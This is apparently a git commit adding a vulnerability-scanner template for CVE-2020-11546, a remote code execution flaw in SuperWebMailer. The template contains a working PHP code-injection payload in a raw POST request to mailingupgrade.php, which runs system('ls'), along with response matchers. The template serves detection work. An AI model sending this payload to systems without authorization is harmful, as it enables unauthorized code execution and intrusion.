Added CVE-2020-11546 (#3436)

Co-Authored-By: 0fficial_BlackHat13 <58517369+Official-BlackHat13@users.noreply.github.com>

Co-authored-by: 0fficial_BlackHat13 <58517369+Official-BlackHat13@users.noreply.github.com>

cves/2020/CVE-2020-11546.yaml

@@ -0,0 +1,40 @@
+id: CVE-2020-11546
+
+info:
+  author: Official_BlackHat13
+  severity: critical
+  name: SuperWebmailer Remote Code Execution
+  description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.
+  tags: cve,cve2020,rce,superwebmailer
+  reference:
+    - https://github.com/Official-BlackHat13/CVE-2020-11546/
+    - https://blog.to.com/advisory-superwebmailer-cve-2020-11546/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-11546
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-11546
+    cwe-id: CWE-94
+
+requests:
+  - raw:
+      - |
+        POST /mailingupgrade.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        step=1&Language=de{${system("ls")}}&NextBtn=Weiter+%3E
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - ajax_ccea.php
+          - ajax_getemailingactions.php
+          - ajax_getemailtemplates.php
+        condition: and